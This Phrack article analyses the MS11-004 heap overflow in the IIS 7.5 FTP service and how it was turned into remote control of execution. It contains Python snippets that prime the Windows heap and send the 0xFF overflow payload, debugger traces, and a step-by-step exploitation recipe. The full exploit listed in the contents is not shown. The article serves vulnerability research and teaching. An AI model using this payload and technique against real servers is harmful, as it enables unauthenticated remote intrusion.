                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x0c of 0x13

|=-----------------------------------------------------------------------=|
|=-------------=[ The Art of Exploitation ]=-----------------=|
|=-----------------------------------------------------------------------=|
|=-------------------=[ Exploiting MS11-004 ]=-----------------------=|
|=----------=[ Microsoft IIS 7.5 remote heap buffer overflow ]=----------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ by redpantz ]=----------------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of Contents

  1 - Introduction
  2 - The Setup
  3 - The Vulnerability
  4 - Exploitation Primitives
  5 - Enabling the LFH
  6 - FreeEntryOffset Overwrite
  7 - The Impossible
  8 - Conclusion
  9 - References
 10 - Exploit (thing.py)

--[ 1 - Introduction

Exploitation of security vulnerabilities has greatly increased in
difficulty since the days of the Slammer worm. Numerous exploitation
mitigations have been implemented since the early 2000s. Many of these
mitigations focused on the Windows heap, such as Safe Unlinking and Heap
Chunk header cookies in Windows XP Service Pack 2 and Safe Linking,
expanded Encoded Chunk headers, Terminate on Corruption, and many others
in Windows Vista/7 [1].

The wide deployment of anti-exploitation technologies has made gaining
code execution from vulnerabilities much more expensive (notice that I
say "expensive" and not "impossible"). By forcing the attacker to acquire
more knowledge and spend extensive amounts of research time, the vendor
has made exploiting these vulnerabilities increasingly difficult.

This article will take you through the exploitation process (read: EIP)
of a heap overflow vulnerability in Microsoft IIS 7.5 (MS11-004) on a
32-bit, single-core machine.
While the target is a bit unrealistic for the real world, and exploit
reliability may be a bit suspect, it does suffice in showing that an
"impossible to exploit" vulnerability can be leveraged for code execution
with proper knowledge and sufficient time.

Note: The structure of this article will reflect the steps, in order,
taken when developing the exploit. It differs from the linear nature of
the actual exploit because it is designed to show the thought process
during exploit development. Also, since this article was authored quite
some time after the initial exploitation process, some steps may have
been left out (i.e. forgotten); quite sorry about that.

--[ 2 - The Setup

In December 2010 Matthew Bergin released a proof of concept describing
an unauthenticated Denial of Service (DoS) against IIS FTP 7.5, which was
triggered on Windows 7 Ultimate [3]. The exploit appeared to lack
precision, so it was decided that further investigation was necessary.

After creating a test environment, the exploit was run with a debugger
attached to the FTP process.
Examination of the error concluded it wasn't a DoS and most likely could
be used to achieve remote code execution:

BUGCHECK_STR:
APPLICATION_FAULT_ACTIONABLE_HEAP_CORRUPTION_\
heap_failure_freelists_corruption

PRIMARY_PROBLEM_CLASS:
ACTIONABLE_HEAP_CORRUPTION_heap_failure_freelists_corruption

DEFAULT_BUCKET_ID:
ACTIONABLE_HEAP_CORRUPTION_heap_failure_freelists_corruption

STACK_TEXT:
77f474cb ntdll!RtlpCoalesceFreeBlocks+0x3c9
77f12eed ntdll!RtlpFreeHeap+0x1f4
77f12dd8 ntdll!RtlFreeHeap+0x142
760074d9 KERNELBASE!LocalFree+0x27
72759c59 IISUTIL!BUFFER::FreeMemory+0x14
724ba6e3 ftpsvc!FTP_COMMAND::WriteResponseAndLog+0x8f
724beff8 ftpsvc!FTP_COMMAND::Process+0x243
724b6051 ftpsvc!FTP_SESSION::OnReadCommandCompletion+0x3e2
724b76c7 ftpsvc!FTP_CONTROL_CHANNEL::OnReadCommandCompletion+0x1e4
724b772a ftpsvc!FTP_CONTROL_CHANNEL::AsyncCompletionRoutine+0x17
7248f182 ftpsvc!FTP_ASYNC_CONTEXT::OverlappedCompletionRoutine+0x3c
724a56e6 ftpsvc!THREAD_POOL_DATA::ThreadPoolThread+0x89
724a58c1 ftpsvc!THREAD_POOL_DATA::ThreadPoolThread+0x24
724a4f8a ftpsvc!THREAD_MANAGER::ThreadManagerThread+0x42
76bf1194 kernel32!BaseThreadInitThunk+0xe
77f1b495 ntdll!__RtlUserThreadStart+0x70
77f1b468 ntdll!_RtlUserThreadStart+0x1b

While simple write-4 primitives have been extinct since the Windows XP
SP2 days [1], there was a feeling that currently known, but previously
unproven techniques could be leveraged to gain code execution. Adding
fuel to the fire was a statement from Microsoft stating that the issue
"is a Denial of Service vulnerability and remote code execution is
unlikely" [4].

With the wheels set in motion, it was time to figure out the
vulnerability, gather exploitation primitives, and subvert the flow of
execution by any means necessary...

--[ 3 - The Vulnerability

The first order of business was to figure out the root cause of the
vulnerability.
Understanding the root cause of the vulnerability was integral to forming
a more refined and concise proof of concept that would serve as a
foundation for exploit development.

As stated in the TechNet article, the flaw stemmed from an issue when
processing Telnet IAC codes [5]. The IAC codes permit a Telnet client to
tell the Telnet server various commands within the session. The 0xFF
character denotes these commands. TechNet also describes a process that
requires the 0xFF characters to be 'escaped' when sending a response by
adding an additional 0xFF character.

Now that there is context around the vulnerability, the corresponding
crash dump can be further analyzed. Afterwards we can open the binary in
IDA Pro and attempt to locate the affected code. Unfortunately, after
statically cross-referencing the function calls from the stack trace,
there didn't seem to be any functions that performed actions on Telnet
IAC codes. While breakpoints could be set on any of the functions in the
stack trace, another path was taken.

Since the public symbols named most of the important functions within
the ftpsvc module, it was deemed more useful to search the function list
than set debugger breakpoints. A search was made for any function
starting with 'TELNET', resulting in
'TELNET_STREAM_CONTEXT::OnReceivedData' and
'TELNET_STREAM_CONTEXT::OnSendData'. The returned results proved to be
viable after some quick dynamic analysis when sending requests and
receiving responses.

The OnReceivedData function was investigated first, since it was the
first breakpoint that was hit. Essentially the function attempts to
locate Telnet IAC codes (0xFF), escape them, parse the commands and
normalize the request. Unfortunately it doesn't account for seeing two
consecutive IAC codes.

The following is pseudo code for important portions of OnReceivedData:

TELNET_STREAM_CONTEXT::OnReceivedData(char *aBegin,
        DATA_STREAM_BUFFER *aDSB, ...)
{
    DATA_STREAM_BUFFER *dsb = aDSB;
    int len = dsb->BufferLength;
    char *begin = dsb->BufferBegin;
    char *adjusted = dsb->BufferBegin;
    char *end = dsb->BufferEnd;
    char *curr = dsb->BufferBegin;

    if(len >= 3)
    {
        //0xF2 == 242 == Data Mark
        if(begin[0] == 0xFF && begin[1] == 0xFF && begin[2] == 0xF2)
            curr = begin + 3;
    }

    bool seen_iac = false;
    bool seen_subneg = false;

    if(curr >= end)
        return 0;

    while(curr < end)
    {
        char curr_char = *curr;

        //if we've seen an iac code
        //look for a corresponding cmd
        if(seen_iac)
        {
            seen_iac = false;
            if(seen_subneg)
            {
                seen_subneg = false;
                if(curr_char < 0xF0)
                    *adjusted++ = curr_char;
            }
            else
            {
                if(curr_char != 0xFA)
                {
                    if(curr_char != 0xFF)
                    {
                        if(curr_char < 0xF0)
                        {
                            PuDbgPrint("Invalid command %c", curr_char);
                            if(curr_char)
                                *adjusted++ = curr_char;
                        }
                    }
                    else
                    {
                        if(curr_char)
                            *adjusted++ = curr_char;
                    }
                }
                else
                {
                    seen_iac = true;
                    seen_subneg = true;
                }
            }
        }
        else
        {
            if(curr_char == 0xFF)
                seen_iac = true;
            else if(curr_char)
                *adjusted++ = curr_char;
        }

        curr++;
    }

    dsb->BufferLength = adjusted - begin;
    return 0;
}

The documentation describes the purpose of Telnet IAC codes as follows:
"Either end of a Telnet conversation can locally or remotely enable or
disable an option". The diagram below represents the 3-byte IAC command
within the overall Telnet connection stream:

0x0                          0x2
--------------------------------
[IAC][Type of Operation][Option]
--------------------------------

Note: The spec should have been referenced before figuring out the
vulnerability, instead of reading the code and attempting to figure out
what could go wrong.

Although there is code to escape IAC characters, the function does not
expect to see two consecutive 0xFF characters. Obviously this could be a
problem, but the function didn't appear to contain any code that would
result in an overflow. Thinking about the TechNet article recalled the
line 'error in the response', so the next logical function to examine
was 'OnSendData'.
Shortly into the function it can be seen that OnSendData is looking for
IAC (0xFF) codes:

.text:0E07F375 loc_E07F375:
.text:0E07F375         inc     edx
.text:0E07F376         cmp     byte ptr [edx], 0FFh
.text:0E07F379         jnz     short loc_E07F37C
.text:0E07F37B         inc     edi
.text:0E07F37C
.text:0E07F37C loc_E07F37C:
.text:0E07F37C         cmp     edx, ebx
.text:0E07F37E         jnz     short loc_E07F375 ; count the number
                                                 ; of "0xFF" characters

The following pseudo code represents the integral pieces of OnSendData:

TELNET_STREAM_CONTEXT::OnSendData(DATA_STREAM_BUFFER *dsb)
{
    char *begin = dsb->BufferBegin;
    char *start = dsb->BufferBegin;
    char *end = dsb->BufferEnd;
    int len = dsb->BufferLength;
    int iac_count = 0;

    if(begin + len == end)
        return 0;

    //do a total count of the IAC codes
    do
    {
        start++;
        if(*start == 0xFF)
            iac_count++;
    }
    while(start < end);

    if(!iac_count)
        return 0;

    for(char *c = begin; c != end; *begin++ = *c)
    {
        c++;
        if(*c == 0xFF)
            *begin++ = 0xFF;
    }

    return 0;
}

As you can see, if the function encounters a 0xFF that is NOT separated
by at least 2 bytes then there is a potential to escape the code more
than once, which will eventually lead to a heap corruption into adjacent
memory based on the size of the request and the number of IAC codes.

For example, if you were to send the string
"\xFF\xBB\xFF\xFF\xFF\xBB\xFF\xFF" to the server, OnReceivedData produces
the values:

1) Before OnReceivedData
   a. DSB->BufferLength = 8
   b. DSB->Buffer = "\xFF\xBB\xFF\xFF\xFF\xBB\xFF\xFF"

2) After OnReceivedData
   a. DSB->BufferLength = 4
   b. DSB->Buffer = "\xBB\xFF\xBB\xFF"

Although OnReceivedData attempted to escape the IAC codes, it didn't
expect to see multiple 0xFFs within a certain range, and therefore wrote
the illegitimate values at a range that is unacceptable for OnSendData.
Using the same string from above, OnSendData would write multiple 0xFF
characters past the end of the buffer due to de-synchronization between
the reading and writing into the same buffer.
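
The before/after values above can be reproduced with a small model. The
following is only a sketch of the OnReceivedData pseudo code in Python,
not the real ftpsvc routine; the names normalize_received,
escape_for_send and escaped_size are made up for illustration. It also
shows the arithmetic a correct escaping step has to respect: every 0xFF
in the response costs one extra byte, so the destination must hold
len(data) + count(0xFF) bytes.

```python
IAC = 0xFF       # Telnet "Interpret As Command"
SUBNEG = 0xFA    # subnegotiation begin
DATA_MARK = 0xF2
CMD_MIN = 0xF0   # bytes >= 0xF0 are treated as Telnet commands


def normalize_received(data: bytes) -> bytes:
    """Toy model of the OnReceivedData pseudo code (hypothetical name)."""
    out = bytearray()
    i = 0
    # Skip a leading IAC IAC DATA-MARK sequence, as the pseudo code does.
    if len(data) >= 3 and data[0] == IAC and data[1] == IAC \
            and data[2] == DATA_MARK:
        i = 3
    seen_iac = False
    seen_subneg = False
    while i < len(data):
        c = data[i]
        if seen_iac:
            seen_iac = False
            if seen_subneg:
                seen_subneg = False
                if c < CMD_MIN:
                    out.append(c)
            elif c == SUBNEG:
                seen_iac = True
                seen_subneg = True
            elif c == IAC:
                out.append(c)      # "IAC IAC" collapses to a literal 0xFF
            elif c < CMD_MIN and c != 0:
                out.append(c)      # invalid command byte is kept as data
        elif c == IAC:
            seen_iac = True
        elif c != 0:
            out.append(c)
        i += 1
    return bytes(out)


def escaped_size(data: bytes) -> int:
    """Bytes needed to hold data once every 0xFF has been doubled."""
    return len(data) + data.count(IAC)


def escape_for_send(data: bytes) -> bytes:
    """Escape into a NEW buffer, so reads and writes cannot collide."""
    return data.replace(b"\xff", b"\xff\xff")


if __name__ == "__main__":
    sample = b"\xff\xbb\xff\xff\xff\xbb\xff\xff"
    normalized = normalize_received(sample)
    print(len(sample), len(normalized), normalized)
    print(escaped_size(normalized), escape_for_send(normalized))
```

With the example string, the model returns the same 4-byte buffer listed
above, and escaping it needs 6 bytes. Any routine that escapes in place
into storage sized for the unescaped data has to run past the end by the
number of 0xFF characters it doubles.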
Now that it is known that a certain number of 0xFF characters can be
written past the end of the buffer, it is time to think about an
exploitation strategy and gather primitives...

--[ 4 - Exploitation Primitives

Exploitation primitives can be thought of as the building blocks of
exploit development. They can be as simple as program functionality that
produces a desired result or as complicated as a 1-to-n byte overflow.
This section will cover many of the primitives used within the exploit.

In-depth knowledge of the underlying operating system usually proves to
be invaluable when writing exploits. This holds true for the IIS FTP
exploit, as intricate knowledge of the Windows 7 Low Fragmentation Heap
served as the basis for exploitation.

It was decided that the FreeEntryOffset Overwrite Technique [2] would be
used due to the limited ability of the attacker to control the contents
of the overflow. The attack requires the exploiter to enable the low
fragmentation heap, position a chunk under the exploiter's control before
a free chunk (implied same size) within the same UserBlock, write at
least 10 bytes past the end of its buffer, and finally make two
subsequent requests that are serviced from the same UserBlock. [Yes, it's
just that easy ;)]

The following diagram shows how the FreeEntryOffset is utilized when
making allocations. The first allocation comes from a virgin UserBlock,
setting the FreeEntryOffset to the first two-byte value stored in the
current free chunk. Notice there is no validation when updating the
FreeEntryOffset.
For MUCH more information on the LFH and exploitation techniques please
see the references section:

Allocation 1
FreeEntryOffset = 0x10
---------------------------------
|Header|0x10|       Free        |
---------------------------------
|Header|0x20|       Free        |
---------------------------------
|Header|0x30|       Free        |
---------------------------------

Allocation 2
FreeEntryOffset = 0x20
---------------------------------
|Header|        Used            |
---------------------------------
|Header|0x20|       Free        |
---------------------------------
|Header|0x30|       Free        |
---------------------------------

Allocation 3
FreeEntryOffset = 0x30
---------------------------------
|Header|        Used            |
---------------------------------
|Header|        Used            |
---------------------------------
|Header|0x30|       Free        |
---------------------------------

Now look at the allocation sequence if we have the ability to overwrite
a FreeEntryOffset with 0xFFFF:

Allocation 1
FreeEntryOffset = 0x10
---------------------------------
|Header|0x10|       Free        |
---------------------------------
|Header|0x20|       Free        |
---------------------------------
|Header|0x30|       Free        |
---------------------------------

Allocation 2
FreeEntryOffset = 0x20
---------------------------------
|Header|FFFFFFFFFFFFFFF         |
---------------------------------
|Header|FFFF|       Free        |
---------------------------------
|Header|0x30|       Free        |
---------------------------------

Allocation 3
FreeEntryOffset = 0xFFFF
---------------------------------
|Header|        Used            |
---------------------------------
|Header|        Used            |
---------------------------------
|Header|0x30|       Free        |
---------------------------------

As you can see, if we can overwrite the FreeEntryOffset with a value of
0xFFFF then our next allocation will come from unknown heap memory at
&UserBlock + 8 + (8 * (FreeEntryOffset & 0x7FFF8)) [2]. This may or may
not point to committed memory for the process, but still provides a good
starting point for turning a semi-controlled overwrite into a
fully-controlled overwrite.
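
The two allocation sequences above can be walked through with a toy
model. This is a sketch under loud assumptions, not the real allocator:
ToyUserBlock, its methods and the base address 0x100000 are invented for
illustration, offsets are counted in 8-byte units as in the diagrams, and
the header adjustments in the formula from [2] are ignored. The only
behavior it reproduces is the one the text relies on: the next
FreeEntryOffset is read from the chunk being handed out and is used
without validation.

```python
UNIT = 8  # offsets are expressed in 8-byte blocks (simplifying assumption)


class ToyUserBlock:
    """Toy model of a UserBlock's free-chunk chain (hypothetical class)."""

    def __init__(self, base, stored_next):
        # stored_next maps a chunk's offset to the two-byte "next free
        # offset" value stored at the start of that free chunk.
        self.base = base
        self.stored_next = dict(stored_next)
        self.free_entry_offset = min(self.stored_next)

    def corrupt(self, chunk_offset, value):
        """Model an overflow that rewrites a free chunk's stored offset."""
        self.stored_next[chunk_offset] = value & 0xFFFF

    def allocate(self):
        offset = self.free_entry_offset
        address = self.base + offset * UNIT
        # No sanity check: whatever the chunk stores becomes the new
        # FreeEntryOffset. Memory outside the model is treated as 0.
        self.free_entry_offset = self.stored_next.get(offset, 0)
        return address


def demo(corrupt_second_chunk):
    block = ToyUserBlock(0x100000, {0x00: 0x10, 0x10: 0x20, 0x20: 0x30})
    addresses = [block.allocate()]          # allocation 1
    if corrupt_second_chunk:
        block.corrupt(0x10, 0xFFFF)         # overflow into the next chunk
    addresses.append(block.allocate())      # allocation 2 saves the offset
    addresses.append(block.allocate())      # allocation 3 uses it
    return addresses


if __name__ == "__main__":
    print([hex(a) for a in demo(False)])
    print([hex(a) for a in demo(True)])
```

In the uncorrupted run the three addresses stay inside the toy
UserBlock. In the corrupted run the third address lands 0xFFFF * 8 =
0x7FFF8 bytes past the base, which is the out-of-block allocation the
diagrams describe.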
--[ 5 - Enabling the LFH

If you have read 'Understanding the Low Fragmentation Heap' [2] you'll
know that it has 'lazy' activation, which means, although it is the
default front-end allocator, it isn't enabled until a certain threshold
is exceeded. The most common trigger for enabling the LFH is 16
consecutive allocations of the same size.

for i in range(0, 17):
    name = "lfh" + str(i)
    payload = gen_payload(0x40, "X")
    lfhpool.alloc(name, payload)

You would assume that after making the aforementioned requests
LFH->HeapBucket[0x40] would be enabled and all further requests for size
0x40 would be serviced via the LFH; unfortunately this was not the case.
This led to some memory profiling using Immunity Debugger's '!hippie'
command.

After creating and sending many commands and logging heap allocations, a
pattern of 0x100 byte allocations emerged. This was quite peculiar
because requests of 0x40 bytes were being sent. Tracing the allocations
for 0x100 found that the main consumer of the 0x100 byte allocations was
FTP_SESSION::WriteResponseHelper; our binary audit can finally start!

Note: If some thought had been put in before brute forcing sizes it
would have been noted that this is a C++ application, which means that
request data was most likely kept in some buffer or string class instead
of being allocated to a specific request size.

Lo and behold, looking at the WriteResponseHelper function validated our
speculation.
The function used a buffer class that would allocate 0x100 bytes and
extend itself when necessary:

.text:0E074E7A     mov     eax, [ebp+arg_C]
                           ; dword ptr [eax] == request string
.text:0E074E7D     push    edi
.text:0E074E7E     mov     edi, [ebp+arg_8]
.text:0E074E81     mov     [ebp+vFtpRequest], eax
.text:0E074E87     mov     esi, 100h
.text:0E074E8C     push    esi             ; init_size == 0x100
.text:0E074E8D     lea     eax, [ebp+var_204]
.text:0E074E93     mov     [ebp+var_27C], ecx
.text:0E074E99     push    eax
.text:0E074E9A     lea     ecx, [ebp+var_234]
.text:0E074EA0     call    ds:STRA::STRA(char *,ulong)

Next, there is a loop to determine if the normalized request string can
fit in the STRA object:

.text:0E074F59     call    ds:STRA::QuerySize(void)
.text:0E074F5F     add     eax, eax
.text:0E074F61     push    eax
.text:0E074F62     lea     ecx, [ebp+vSTRA1]
.text:0E074F68     call    ds:STRA::Resize(ulong)

Finally, the STRA object will append the user request data to the server
response code (for example: "500 "):

.text:0E0750B4     push    [ebp+vFtpRequest]
.text:0E0750BA     call    ds:STRA::Append(char const *)
                           ; this is where the
                           ; resize happens
.text:0E0750C0     mov     esi, eax
.text:0E0750C2     cmp     esi, ebx
.text:0E0750C4     jl      loc_E07515F
                           ; if(!STRA::Append(vFtpRequest))
                           ; { destroy_objects(); }
.text:0E0750CA     push    offset SubStr   ; "\r\n"
.text:0E0750CF     lea     ecx, [ebp+var_234]
.text:0E0750D5     call    ds:STRA::Append(char const *)

Looking into the STRA::Append(char const *) function, a constant value
is added when there is not enough space to append to the current STRA
object:

.text:6C9DAAE7     cmp     ebx, edx
.text:6C9DAAE9     ja      short loc_6C9DAB3D  ; if enough room, copy
                                               ; and update size
.text:6C9DAAEB     jb      short loc_6C9DAAF2  ; otherwise add 0x80
                                               ; and resize the BUFFER
.text:6C9DAAED     cmp     [edi+24h], esi
.text:6C9DAAF0     jnb     short loc_6C9DAB3D
.text:6C9DAAF2
.text:6C9DAAF2 loc_6C9DAAF2:
.text:6C9DAAF2     xor     esi, esi
.text:6C9DAAF4     cmp     [ebp+arg_C], esi
.text:6C9DAAF7     jz      short loc_6C9DAB00
.text:6C9DAAF9     add     eax, 80h            ; eax = buffer.size

Finally the buffer is resized if necessary and the old data is copied
over:

.text:6C9DAB1B     push    eax             ; uBytes
.text:6C9DAB1C     mov     ecx, edi
.text:6C9DAB1E     call    ?Resize@BUFFER@@QAEHI@Z ; BUFFER::Resize(uint)
.text:6C9DAB23     test    eax, eax
.text:6C9DAB25     jnz     short loc_6C9DAB3D
.text:6C9DAB27     call    ds:__imp_GetLastError
.text:6C9DAB2D     cmp     eax, esi
.text:6C9DAB2F     jle     short loc_6C9DAB64
.text:6C9DAB31     and     eax, 0FFFFh
.text:6C9DAB36     or      eax, 80070000h
.text:6C9DAB3B     jmp     short loc_6C9DAB64
.text:6C9DAB3D
.text:6C9DAB3D loc_6C9DAB3D:
.text:6C9DAB3D
.text:6C9DAB3D     mov     ebx, [ebp+Size]
.text:6C9DAB40     mov     eax, [edi+20h]
.text:6C9DAB43     mov     esi, [ebp+arg_8]
.text:6C9DAB46     push    ebx             ; Size
.text:6C9DAB47     push    [ebp+Src]       ; Src
.text:6C9DAB4A     add     eax, esi
.text:6C9DAB4C     push    eax             ; Dst
.text:6C9DAB4D     call    memcpy

Now that it is known buffers will be sized in multiples of 0x80 (i.e.
0x100, 0x180, 0x200, etc), the LFH can be activated accordingly (by
size). The size of 0x180 was chosen because 0x100 is used for most, if
not all, initial responses, but _any_ valid size could be used.

for i in range(0, LFHENABLESIZE):
    name = "lfh" + str(i)
    payload = gen_payload(0x180, "X")
    lfhpool.alloc(name, payload)

--[ 6 - FreeEntryOffset Overwrite

It has already been verified that the vulnerability results in an
overflow of 0xFF characters into an adjacent heap chunk. Therefore the
ability to enable the LFH for a certain size results in the trivial
overwriting of an adjacent FreeEntryOffset.

For this exploitation technique to work, the LFH must be enabled while
ensuring that the UserBlock maintains a few free chunks to service
requests necessary for exploitation.
Fortunately, this was quite easy to guarantee while on a single-core
machine:

for i in range(0, LFHENABLESIZE):
    name = "lfh" + str(i)
    payload = gen_payload(0x180, "X")
    lfhpool.alloc(name, payload)

print "[*] Sending overflow payload"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
data = s.recv(1024)
buf = "\xff\xbb\xff\xff" * 112 + "\r\n" #ends up allocation 0x180
                                        #(0x188 after chunk header)
print "[*] Sending %d 0xFFs in the whole payload" % countff(buf)
print "[*] Sending Payload...(%d bytes)" % len(buf)
analyze(buf)
s.send(buf)
s.close()

These small portions of code are enough to enable the LFH and overwrite
a free adjacent chunk after the overflow-able piece of memory. Now when
subsequent allocations are made for 0x180 bytes, a bad free entry offset
will be used, providing the application with unexpected memory for
appending the response.

The above describes the following:

FreeEntryOffset = 0x1

     0          1             2              3
[UsedChunk][FreeChunk][OverflowedChunk][FreeChunk]
                    .
                    .
                    .
[UnknownMemory @ UserBlock + (0xFFFF * 8)]

Three subsequent allocations will accomplish the following:

1) Allocate FreeChunk at FreeEntryOffset 0x1
2) Allocate OverflowedChunk (which is also free), updating the
   FreeEntryOffset to 0xFFFF
3) Allocate memory at UserBlock + (0xFFFF * 8) (instead of offset 0x3)

This means the memory returned for the bad FreeEntryOffset will be
filled with data completely controlled by the attacker.

Note: Although quite easily achieved on a single-core machine, heap
determinism can be much harder on a multi-core platform. Determinism can
be much more difficult because each core will effectively have its own
UserBlocks, making chunk placement dependent on which thread services a
request. While a multi-core machine doesn't make this vulnerability
completely un-exploitable, it does increase the difficulty and decrease
the reliability.
Overwriting the FreeEntryOffset with 0xFFFF has turned a limited heap
overflow into a write-n, fully controlled overflow, since the heap chunk
allocated will be 100% populated with user-controlled data. There is only
one HUGE problem. What should be overwritten? This ended up being the
most challenging and least reliable portion of the exploit and could
still be further refined.

--[ 7 - The Impossible

In all honesty, the previous few steps were basic vulnerability analysis,
rudimentary Python and requisite knowledge of Windows 7 heap internals.
The most difficult and time-consuming portion is explained below. The
techniques described below had varying degrees of reliability and might
not even be the best choice for exploitation. The most valuable knowledge
to take away will be the process of finding an object to overwrite and
seeding those objects remotely within the heap.

As stated previously, figuring out WHAT to overwrite is quite a problem.
Not only does a sufficient object, function, or variable need to be
unearthed, but that item needs to reside in memory where the 'bad'
allocation points to.

A starting point for locating what to overwrite was the function list.
The function list was chosen because public symbols were available,
providing descriptive names for the most important functions. Also, since
the application was written in C++ it was assumed that there would be
virtual functions that stored function pointers somewhere in memory.

The first noticeable item that looked promising was the FTP_COMMAND
class. The class will most certainly be instantiated when receiving new
commands and also contains a vtable.

.text:0E073B7D public: __thiscall FTP_COMMAND::FTP_COMMAND(void) proc near
.text:0E073B7D     mov     edi, edi
.text:0E073B7F     push    ebx
.text:0E073B80     push    esi
.text:0E073B81     mov     esi, ecx
.text:0E073B83     push    edi
.text:0E073B84     lea     ecx, [esi+0Ch]
.text:0E073B87     mov     dword ptr [esi], offset const
                           FTP_COMMAND::`vftable'

It also contained a function pointer that had the same name as one in
our stack trace, albeit in a different class.

.text:0E073C8D     mov     dword ptr [ebx+8], offset
                   FTP_COMMAND::AsyncCompletionRoutine(FTP_ASYNC_CONTEXT *)

Note: If the stack trace had been examined more thoroughly, it would
have been obvious that this wasn't the correct choice, as you will see
below.

At first glance this seemed to be the perfect fit. A breakpoint was set
in ntdll!RtlpLowFragHeapAllocFromContext() after the initial overflow
had occurred, and the memory returned by the bad allocation appeared to
be populated with FTP_COMMAND objects! Unfortunately, there didn't seem
to be a remote command that could trigger a virtual function call within
the FTP_COMMAND object at the time of an attacker's choosing.

Note: Although summed up in one paragraph, this actually took quite some
time to figure out, as the ability to overwrite a function pointer
severely clouded judgment.

Failure led to flailing around in an attempt to populate heap memory
with objects that were remotely user-controlled without authentication.
Eventually, the thought of each FTP_COMMAND having a specific session
came to mind. The FTP_SESSION class was more closely examined (which was
also in the stack trace; although this stack trace would eventually
change with different heap layouts).

The real question was 'Can this function be reliably triggered at given
time X with user input Y?' Some testing took place and indeed, this
server was truly asynchronous ;). FTP, being a line-based protocol,
requires an end of line / end of command delimiter. The server will
actually wait to process the command until it has received the entire
line [6].
Perhaps an FTP_SESSION object that is associated with an FTP_COMMAND
could be overwritten, leading to control of a virtual function call.

Step tracing was used throughout
FTP_COMMAND::WriteResponseWithErrorTextAndLog and ended up at the
FTP_SESSION::Log() function. This function contained multiple virtual
function calls such as:

.text:0E0761C4     mov     ecx, [edi+3D8h]
.text:0E0761CA     lea     eax, [ebp+var_1B4]
.text:0E0761D0     push    eax             ; int
.text:0E0761D1     push    [ebp+dwFlags]   ; CodePage
.text:0E0761D7     mov     eax, [ecx]
.text:0E0761D9     call    dword ptr [eax+18h]

Now that there is a potential known function pointer in memory to be
overwritten, how can it be called? Surprisingly it was quite simple. By
leaving the trailing '\n' off the end of a command, setting up the heap,
and then sending the end of line delimiter, the instruction
"call dword ptr [eax+18h]" could be reached with full control of EAX.

0:006> r
eax=43434343 ebx=013f2a60 ecx=0145dc98 edx=0104f900 esi=013dfb98
edi=013f2a60 eip=70b661d9 esp=0104f690 ebp=0104f984
iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ftpsvc!FTP_SESSION::Log+0x16b:
70b661d9 ff5018 call dword ptr [eax+18h] ds:0023:4343435b=????????

0:006> k
ChildEBP RetAddr
0104f984 70b6a997 ftpsvc!FTP_SESSION::Log+0x16b
0104fa30 70b6ee86 ftpsvc!FTP_COMMAND::WriteResponseWithErrorTextAndLog+0x188
0104fa48 70b66051 ftpsvc!FTP_COMMAND::Process+0xd1
0104fa88 70b676c7 ftpsvc!FTP_SESSION::OnReadCommandCompletion+0x3e2
0104faf0 70b6772a ftpsvc!FTP_CONTROL_CHANNEL::OnReadCommandCompletion+0x1e4
0104fafc 70b3f182 ftpsvc!FTP_CONTROL_CHANNEL::AsyncCompletionRoutine+0x17
0104fb08 70b556e6 ftpsvc!FTP_ASYNC_CONTEXT::OverlappedCompletionRoutine+0x3c

Tracing the function during non-exploitation attempts revealed that the
function was attempting to get the username (if one existed) for logging
purposes.

1b561d9 ff5018 call dword ptr [eax+18h]
ds:0023:71b23a38={ftpsvc!USER_SESSION::QueryUserName (71b37823)}

Note: Again, this wasn't directly obvious by looking at the function.
There was quite a bit of static and dynamic analysis to determine the
function's usefulness.

Although the ability to spray the heap with FTP_COMMAND and FTP_SESSION
objects is possible, it is not as reliable as originally expected. Many
factors such as number of connections, the low fragmentation heap setup
(i.e. number of cores on the server) and many others come into play when
attempting to exploit this vulnerability.

For example, the number of LFH chunks and the number of connections to
the server ended up having quite an effect on the reliability of the
exploit, which hovered around 60%. Both affected which address the
misaligned allocation pointed to and the contents of that memory.

--[ 8 - Conclusion

Although Microsoft and many others claimed that this vulnerability would
be impossible to exploit for code execution, this paper shows that with
the correct knowledge and enough determination, impossible turns to
difficult.

To recap the exploitation process:

 1) Figure out the vulnerability
 2) Familiarize oneself with how heap memory is managed
 3) Obtain in-depth knowledge of the operating system's memory managers
 4) Prime the LFH to a semi-deterministic state
 5) Send a request to overflow an adjacent chunk on the LFH
 6) Create numerous connections in an attempt to populate the heap with
    FTP_SESSION objects; which will create USER_SESSION objects as well
 7) Send an unfinished request on the previously created connections
 8) Make 3 allocations from the LFH for same size as your overflowable
    chunk
    a. 1st == Allocate and overflow into next chunk
    b. 2nd == FreeEntryOffset will be set to 0xFFFF
    c. 3rd == Allocation will (hopefully) point to memory which points
       to a FTP_SESSION object containing a USER_SESSION class;
       completely overwriting the function pointer in memory
 9) Finish the command from the connection pool by sending a trailing
    '\n', which in turn calls the OverlappedCompletionRoutine(),
    therefore calling the FTP_SESSION::Log() function in the process
10) This will obtain EIP with multiple registers pointing to
    user-controlled data. From there ASLR and DEP will need to be
    subverted to gain code execution. Take a look at
    DATA_STREAM_BUFFER.Size, which will determine how many bytes are
    sent back to a user in a response.

Although full arbitrary code execution wasn't achieved in the exploit,
it still proves that a remote attacker can potentially gain control over
EIP via a remote unauthenticated FTP connection that can be used to
subvert the security posture of the entire system, instead of limiting
the scope to a denial of service.

The era of simple exploitation is behind us and more exploitation
primitives must be used when developing modern exploits. By having a
strong foundation of operating system knowledge and exploitation
techniques, you, too, can turn impossible bugs into exploitable ones.

--[ 9 - References

[1] - Preventing the exploitation of user mode heap corruption
      vulnerabilities
      (http://blogs.technet.com/b/srd/archive/2009/08/04/preventing-the-exploitation-of-user-mode-heap-corruption-vulnerabilities.aspx)

[2] - Understanding the Low Fragmentation Heap
      (http://illmatics.com/Understanding_the_LFH.pdf)

[3] - Windows 7 IIS 7.5 FTPSVC Denial Of Service
      (http://packetstormsecurity.org/files/96943/Windows-7-IIS-7.5-FTPSVC-Denial-Of-Service.html)

[4] - Assessing an IIS FTP 7.5 Unauthenticated Denial of Service
      Vulnerability
      (http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx)

[5] - The Telnet Protocol
      (http://support.microsoft.com/kb/231866)

